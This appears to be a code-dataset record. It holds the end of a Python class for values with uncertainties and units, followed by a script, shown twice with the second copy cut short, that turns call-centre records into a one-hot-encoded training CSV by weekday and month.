- This class don't support memmapping. Is intended to be in memory ops.
- Units are handled by `~astropy.units`.
- Math operations cares about units and uncertainties.
"""
_nominal = None
_uncert = None
_unit = None
def __init__(self, value, uncertainty=None, unit=None):
self.nominal = value
self.uncertainty = uncertainty
self.unit = unit
def _set_uncert(self, value):
if value is None:
self._uncert = None
else:
if np.shape(value) != np.shape(self._nominal):
raise ValueError('Uncertainty with shape different from '
'nominal value: '
f'{np.shape(value)} '
f'{np.shape(self._nominal)}')
if check_iterable(self._nominal):
self._uncert = np.array(value)
else:
self._uncert = float(value)
def _set_nominal(self, value):
if value is None:
raise ValueError('Nominal value cannot be None')
self._nominal = value
self._uncert = None # always value is reset, uncertainty resets
# No unit changes
@property
def uncertainty(self):
"""Uncertainty of the quantity."""
if self._uncert is None:
if check_iterable(self._nominal):
return np.zeros_like(self._nominal)
else:
return 0.0
else:
return self._uncert
@uncertainty.setter
def uncertainty(self, value):
self._set_uncert(value)
@property
def nominal(self):
"""Nominal value of the quantity."""
return self._nominal
@nominal.setter
def nominal(self, value):
self._set_nominal(value)
def reset(self, value, uncertainty=None, unit=None):
"""Reset all the data.
Parameters
----------
value : number or array_like
Nominal value(s) of the quantity.
uncertainty : number, array_like or `None` (optional)
Uncertainty value of the quantity. If `None`, the quantity will be
considered with no errors. Must match `value` shape.
unit : `~astropy.units.Unit` or string (optional)
The data unit. Must be `~astropy.units.Unit` compliant.
"""
self.nominal = value
self.uncertainty = uncertainty
self.unit = unit
def __repr__(self):
ret = "< UFloat "
if check_iterable(self._nominal):
ret += str(np.shape(self._nominal))
else:
ret += str(self._nominal)
if self._uncert is not None:
ret += f"+-{self._uncert}"
ret += f" {self.unit} "
ret += " >"
return ret
def _compute_errors(self, derivs, inpnom, inpstd, **kwargs):
"""Compute the error components using func and derivatives."""
n_derivs = len(derivs) # number of expected numerical inputs?
# check if the number of inputs matches the number of derivs
if len(inpnom) != n_derivs or len(inpstd) != n_derivs:
raise ValueError('Inputs and derivatives have different number '
'of components')
axis = kwargs.get('axis')
if axis:
raise NotImplementedError('Not implemented for apply in axis.')
else:
components = [None]*n_derivs
for i in range(n_derivs):
components[i] = derivs[i](*inpnom)*inpstd[i]
return np.sqrt(np.sum(np.square(components)))
return None
def __array_ufunc__(self, ufunc, method, *inputs, **kwargs):
# TODO: check units across the inputs (including inside lists)
global logger
inpnom = copy.copy(inputs)
for c, a in zip([UFloat], ['nominal']):
# This allows more customization
inpnom = _filter_compatible(inputs, c, a)
inpstd = copy.copy(inputs)
for c, a in zip([UFloat], ['uncertainty']):
# This allows more customization
inpstd = _filter_compatible(inputs, c, a, else_None=True)
nkwargs = copy.copy(kwargs)
skwargs = copy.copy(kwargs)
if kwargs.get('out', ()):
nkwargs['out'] = _filter_compatible(nkwargs['out'],
UFloat, 'nominal')
skwargs['out'] = _filter_compatible(skwargs['out'],
UFloat, 'uncertainty',
else_None=True)
ufn = ufunc.__name__
nominal = getattr(ufunc, method)(*inpnom, **nkwargs)
if ufn in numpy_ufunc_derivatives:
std_func = numpy_ufunc_derivatives[ufn]
std = self._compute_errors(std_func, inpnom, inpstd, **skwargs)
else:
logger.warning("Function %s errors is not implemented.", ufn)
std = None
if isinstance(nominal, tuple):
if std is None:
std = [None]*len(nominal)
return tuple(UFloat(n, s, self.unit)
for n, s in zip(nominal, std))
elif method == 'at':
# no return value
return None
else:
# one return value
return UFloat(nominal, std, self.unit)
def ufloat(value, uncertainty=None, unit=None):
"""Create a UFloat quantity to handle operations. Just wrap UFloat
Parameters
----------
value : number or array_like
Nominal value(s) of the quantity.
uncertainty : number, array_like or `None` (optional)
Uncertainty value of the quantity. If `None`, the quantity will be
considered with no errors. Must match `value` shape.
unit : `~astropy.units.Unit` or string (optional)
The data unit. Must be `~astropy.units.Unit` compliant.
Returns
-------
q : `UFloat`
Quantity generated value, with uncertainty and unit.
"""
q = UFloat(value, uncertainty, unit)
return q | 0.757256 | 0.393036 |
import os
import codecs
import date as dg
import pandas as pd
import datetime
def generate_line(timestamp, ass_assignment, calls : int = 0):
line = dg.timestamp_to_date(timestamp)
hour = int(line.split(" ")[1].split(":")[0])
month = int(line.split(" ")[0].split("-")[1])
week_day = datetime.datetime.fromtimestamp(timestamp).strftime('%A')
if (week_day == "Monday"):
if month == 1:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";1;0;0;0;0;0;0;1;0;0;0;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 2:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";1;0;0;0;0;0;0;0;1;0;0;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 3:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";1;0;0;0;0;0;0;0;0;1;0;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 4:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";1;0;0;0;0;0;0;0;0;0;1;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 5:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";1;0;0;0;0;0;0;0;0;0;0;1;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 6:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";1;0;0;0;0;0;0;0;0;0;0;0;1;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 7:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";1;0;0;0;0;0;0;0;0;0;0;0;0;1;0;0;0;0;0;"+ass_assignment+"\n"
if month == 8:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";1;0;0;0;0;0;0;0;0;0;0;0;0;0;1;0;0;0;0;"+ass_assignment+"\n"
if month == 9:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";1;0;0;0;0;0;0;0;0;0;0;0;0;0;0;1;0;0;0;"+ass_assignment+"\n"
if month == 10:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";1;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;1;0;0;"+ass_assignment+"\n"
if month == 11:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";1;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;1;0;"+ass_assignment+"\n"
if month == 12:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";1;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;1;"+ass_assignment+"\n"
if (week_day == "Tuesday"):
if month == 1:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;1;0;0;0;0;0;1;0;0;0;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 2:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;1;0;0;0;0;0;0;1;0;0;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 3:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;1;0;0;0;0;0;0;0;1;0;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 4:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;1;0;0;0;0;0;0;0;0;1;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 5:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;1;0;0;0;0;0;0;0;0;0;1;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 6:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;1;0;0;0;0;0;0;0;0;0;0;1;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 7:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;1;0;0;0;0;0;0;0;0;0;0;0;1;0;0;0;0;0;"+ass_assignment+"\n"
if month == 8:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;1;0;0;0;0;0;0;0;0;0;0;0;0;1;0;0;0;0;"+ass_assignment+"\n"
if month == 9:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;1;0;0;0;0;0;0;0;0;0;0;0;0;0;1;0;0;0;"+ass_assignment+"\n"
if month == 10:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;1;0;0;0;0;0;0;0;0;0;0;0;0;0;0;1;0;0;"+ass_assignment+"\n"
if month == 11:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;1;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;1;0;"+ass_assignment+"\n"
if month == 12:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;1;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;1;"+ass_assignment+"\n"
if (week_day == "Wednesday"):
if month == 1:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;1;0;0;0;0;1;0;0;0;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 2:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;1;0;0;0;0;0;1;0;0;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 3:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;1;0;0;0;0;0;0;1;0;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 4:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;1;0;0;0;0;0;0;0;1;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 5:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;1;0;0;0;0;0;0;0;0;1;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 6:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;1;0;0;0;0;0;0;0;0;0;1;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 7:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;1;0;0;0;0;0;0;0;0;0;0;1;0;0;0;0;0;"+ass_assignment+"\n"
if month == 8:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;1;0;0;0;0;0;0;0;0;0;0;0;1;0;0;0;0;"+ass_assignment+"\n"
if month == 9:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;1;0;0;0;0;0;0;0;0;0;0;0;0;1;0;0;0;"+ass_assignment+"\n"
if month == 10:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;1;0;0;0;0;0;0;0;0;0;0;0;0;0;1;0;0;"+ass_assignment+"\n"
if month == 11:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;1;0;0;0;0;0;0;0;0;0;0;0;0;0;0;1;0;"+ass_assignment+"\n"
if month == 12:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;1;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;1;"+ass_assignment+"\n"
if (week_day == "Thursday"):
if month == 1:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;1;0;0;0;1;0;0;0;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 2:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;1;0;0;0;0;1;0;0;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 3:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;1;0;0;0;0;0;1;0;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 4:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;1;0;0;0;0;0;0;1;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 5:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;1;0;0;0;0;0;0;0;1;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 6:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;1;0;0;0;0;0;0;0;0;1;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 7:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;1;0;0;0;0;0;0;0;0;0;1;0;0;0;0;0;"+ass_assignment+"\n"
if month == 8:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;1;0;0;0;0;0;0;0;0;0;0;1;0;0;0;0;"+ass_assignment+"\n"
if month == 9:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;1;0;0;0;0;0;0;0;0;0;0;0;1;0;0;0;"+ass_assignment+"\n"
if month == 10:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;1;0;0;0;0;0;0;0;0;0;0;0;0;1;0;0;"+ass_assignment+"\n"
if month == 11:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;1;0;0;0;0;0;0;0;0;0;0;0;0;0;1;0;"+ass_assignment+"\n"
if month == 12:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;1;0;0;0;0;0;0;0;0;0;0;0;0;0;0;1;"+ass_assignment+"\n"
if (week_day == "Friday"):
if month == 1:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;1;0;0;1;0;0;0;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 2:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;1;0;0;0;1;0;0;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 3:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;1;0;0;0;0;1;0;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 4:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;1;0;0;0;0;0;1;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 5:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;1;0;0;0;0;0;0;1;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 6:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;1;0;0;0;0;0;0;0;1;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 7:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;1;0;0;0;0;0;0;0;0;1;0;0;0;0;0;"+ass_assignment+"\n"
if month == 8:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;1;0;0;0;0;0;0;0;0;0;1;0;0;0;0;"+ass_assignment+"\n"
if month == 9:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;1;0;0;0;0;0;0;0;0;0;0;1;0;0;0;"+ass_assignment+"\n"
if month == 10:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;1;0;0;0;0;0;0;0;0;0;0;0;1;0;0;"+ass_assignment+"\n"
if month == 11:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;1;0;0;0;0;0;0;0;0;0;0;0;0;1;0;"+ass_assignment+"\n"
if month == 12:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;1;0;0;0;0;0;0;0;0;0;0;0;0;0;1;"+ass_assignment+"\n"
if (week_day == "Saturday"):
if month == 1:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;0;1;0;1;0;0;0;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 2:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;0;1;0;0;1;0;0;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 3:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;0;1;0;0;0;1;0;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 4:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;0;1;0;0;0;0;1;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 5:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;0;1;0;0;0;0;0;1;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 6:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;0;1;0;0;0;0;0;0;1;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 7:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;0;1;0;0;0;0;0;0;0;1;0;0;0;0;0;"+ass_assignment+"\n"
if month == 8:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;0;1;0;0;0;0;0;0;0;0;1;0;0;0;0;"+ass_assignment+"\n"
if month == 9:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;0;1;0;0;0;0;0;0;0;0;0;1;0;0;0;"+ass_assignment+"\n"
if month == 10:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;0;1;0;0;0;0;0;0;0;0;0;0;1;0;0;"+ass_assignment+"\n"
if month == 11:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;0;1;0;0;0;0;0;0;0;0;0;0;0;1;0;"+ass_assignment+"\n"
if month == 12:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;0;1;0;0;0;0;0;0;0;0;0;0;0;0;1;"+ass_assignment+"\n"
if (week_day == "Sunday"):
if month == 1:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;0;0;1;1;0;0;0;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 2:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;0;0;1;0;1;0;0;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 3:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;0;0;1;0;0;1;0;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 4:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;0;0;1;0;0;0;1;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 5:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;0;0;1;0;0;0;0;1;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 6:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;0;0;1;0;0;0;0;0;1;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 7:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;0;0;1;0;0;0;0;0;0;1;0;0;0;0;0;"+ass_assignment+"\n"
if month == 8:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;0;0;1;0;0;0;0;0;0;0;1;0;0;0;0;"+ass_assignment+"\n"
if month == 9:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;0;0;1;0;0;0;0;0;0;0;0;1;0;0;0;"+ass_assignment+"\n"
if month == 10:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;0;0;1;0;0;0;0;0;0;0;0;0;1;0;0;"+ass_assignment+"\n"
if month == 11:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;0;0;1;0;0;0;0;0;0;0;0;0;0;1;0;"+ass_assignment+"\n"
if month == 12:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;0;0;0;1;0;0;0;0;0;0;0;0;0;0;0;1;"+ass_assignment+"\n"
return out_line
def run():
relevant_centers = ["CAT","CMS","Crises","Domicile","Gestion","Gestion - Accueil Telephonique",
"Gestion Assurances","Gestion Clients","Gestion_DZ","Gestion Relation Clienteles",
"Gestion Renault","Japon","Manager","Médical","Mécanicien","Nuit","Prestataires",
"RENAULT","Regulation Medicale","RTC","SAP","Services","Tech. Axa","Tech. Inter",
"Tech. Total","Téléphonie"]
with codecs.open("data/train_2011_2012_2013.csv", "r", encoding='utf-8') as in_file:
out = codecs.open('data/train.csv', 'w', encoding='utf-8')
first_line = True
line_counter = 0
total_lines = 10878471
print("Done: 0 lines", end="")
for line in in_file:
if line_counter % 1000 == 0:
print("\rDone: {}/{} ({}%) lines".format(line_counter, total_lines,
int(line_counter / total_lines * 100)), end="")
line = line.split('\n')[0]
if first_line:
line = line.split(";")
out.write(line[0]+";"+line[81]+";Hour;Monday;Tuesday;Wednesday;Thursday;Friday;Saturday;Sunday;January;February;March;April;May;June;July;August;September;October;November;December;"+line[12]+"\n")
first_line = False
line_counter += 1
continue
line = line.split(";")
if line[12] in relevant_centers:
timestamp = int(dg.date_to_timestamp(line[0]))
out_line = generate_line(timestamp, line[12], int(line[81]))
out.write(out_line)
line_counter += 1
print("\rDone: {}/{} ({}%) lines".format(line_counter, total_lines, int(line_counter / total_lines * 100)))
out.close()
#file = pd.read_csv('data/train.csv', sep = ';')
#file.sort_values('DATE',inplace=True)
#file.to_csv("data/train_sorted.csv", sep=";", encoding = 'utf-8', index=False)
if __name__ == "__main__":
run() | src/build_train_csv.py | import os
import codecs
import date as dg
import pandas as pd
import datetime
def generate_line(timestamp, ass_assignment, calls : int = 0):
line = dg.timestamp_to_date(timestamp)
hour = int(line.split(" ")[1].split(":")[0])
month = int(line.split(" ")[0].split("-")[1])
week_day = datetime.datetime.fromtimestamp(timestamp).strftime('%A')
if (week_day == "Monday"):
if month == 1:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";1;0;0;0;0;0;0;1;0;0;0;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 2:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";1;0;0;0;0;0;0;0;1;0;0;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 3:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";1;0;0;0;0;0;0;0;0;1;0;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 4:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";1;0;0;0;0;0;0;0;0;0;1;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 5:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";1;0;0;0;0;0;0;0;0;0;0;1;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 6:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";1;0;0;0;0;0;0;0;0;0;0;0;1;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 7:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";1;0;0;0;0;0;0;0;0;0;0;0;0;1;0;0;0;0;0;"+ass_assignment+"\n"
if month == 8:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";1;0;0;0;0;0;0;0;0;0;0;0;0;0;1;0;0;0;0;"+ass_assignment+"\n"
if month == 9:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";1;0;0;0;0;0;0;0;0;0;0;0;0;0;0;1;0;0;0;"+ass_assignment+"\n"
if month == 10:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";1;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;1;0;0;"+ass_assignment+"\n"
if month == 11:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";1;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;1;0;"+ass_assignment+"\n"
if month == 12:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";1;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;1;"+ass_assignment+"\n"
if (week_day == "Tuesday"):
if month == 1:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;1;0;0;0;0;0;1;0;0;0;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 2:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;1;0;0;0;0;0;0;1;0;0;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 3:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;1;0;0;0;0;0;0;0;1;0;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 4:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;1;0;0;0;0;0;0;0;0;1;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 5:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;1;0;0;0;0;0;0;0;0;0;1;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 6:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;1;0;0;0;0;0;0;0;0;0;0;1;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 7:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;1;0;0;0;0;0;0;0;0;0;0;0;1;0;0;0;0;0;"+ass_assignment+"\n"
if month == 8:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;1;0;0;0;0;0;0;0;0;0;0;0;0;1;0;0;0;0;"+ass_assignment+"\n"
if month == 9:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;1;0;0;0;0;0;0;0;0;0;0;0;0;0;1;0;0;0;"+ass_assignment+"\n"
if month == 10:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;1;0;0;0;0;0;0;0;0;0;0;0;0;0;0;1;0;0;"+ass_assignment+"\n"
if month == 11:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;1;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;1;0;"+ass_assignment+"\n"
if month == 12:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;1;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;1;"+ass_assignment+"\n"
if (week_day == "Wednesday"):
if month == 1:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;1;0;0;0;0;1;0;0;0;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 2:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;1;0;0;0;0;0;1;0;0;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 3:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;1;0;0;0;0;0;0;1;0;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 4:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;1;0;0;0;0;0;0;0;1;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 5:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;1;0;0;0;0;0;0;0;0;1;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 6:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;1;0;0;0;0;0;0;0;0;0;1;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 7:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;1;0;0;0;0;0;0;0;0;0;0;1;0;0;0;0;0;"+ass_assignment+"\n"
if month == 8:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;1;0;0;0;0;0;0;0;0;0;0;0;1;0;0;0;0;"+ass_assignment+"\n"
if month == 9:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;1;0;0;0;0;0;0;0;0;0;0;0;0;1;0;0;0;"+ass_assignment+"\n"
if month == 10:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;1;0;0;0;0;0;0;0;0;0;0;0;0;0;1;0;0;"+ass_assignment+"\n"
if month == 11:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;1;0;0;0;0;0;0;0;0;0;0;0;0;0;0;1;0;"+ass_assignment+"\n"
if month == 12:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;1;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;1;"+ass_assignment+"\n"
if (week_day == "Thursday"):
if month == 1:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;1;0;0;0;1;0;0;0;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 2:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;1;0;0;0;0;1;0;0;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 3:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;1;0;0;0;0;0;1;0;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 4:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;1;0;0;0;0;0;0;1;0;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 5:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;1;0;0;0;0;0;0;0;1;0;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 6:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;1;0;0;0;0;0;0;0;0;1;0;0;0;0;0;0;"+ass_assignment+"\n"
if month == 7:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;1;0;0;0;0;0;0;0;0;0;1;0;0;0;0;0;"+ass_assignment+"\n"
if month == 8:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;1;0;0;0;0;0;0;0;0;0;0;1;0;0;0;0;"+ass_assignment+"\n"
if month == 9:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;1;0;0;0;0;0;0;0;0;0;0;0;1;0;0;0;"+ass_assignment+"\n"
if month == 10:
out_line = str(timestamp)+";"+str(calls)+";"+str(hour)+";0;0;0;1;0;0;0;0;0;0;0;0;0;0;0;0;1;0;0;"+ass_assignment+"\n"
if month == 11:
